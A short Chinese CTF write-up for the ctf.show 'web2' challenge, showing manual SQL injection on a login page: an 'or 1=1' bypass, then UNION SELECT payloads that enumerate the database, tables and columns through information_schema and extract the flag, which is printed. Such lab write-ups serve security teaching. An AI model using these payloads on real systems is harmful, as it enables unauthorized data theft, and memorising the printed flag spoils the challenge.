ctf.show_web2

打开是个登录页面，

1' or 1=1#测一下，是sql注入

手工注入吧，懒得sqlmap跑了

首先用order by测有几列数据，但是这里order by不回显，不知道为啥

直接下一步

1' or 1=1 union select 1,2,3 #

 

好了，有三列，且回显为2

查看当前数据库

1' or 1=1 union select 1,database(),3 #

 

 爆表

1' or 1=1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema="web2"#

 

 

爆字段

admin' or 1=1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name="flag"#

 

爆值

1' or 1=1 union select 1,flag,3 from flag#

 

 

获得flag：

ctfshow{2bd07f28-2658-4263-a4c8-b51e9c0a3f4f}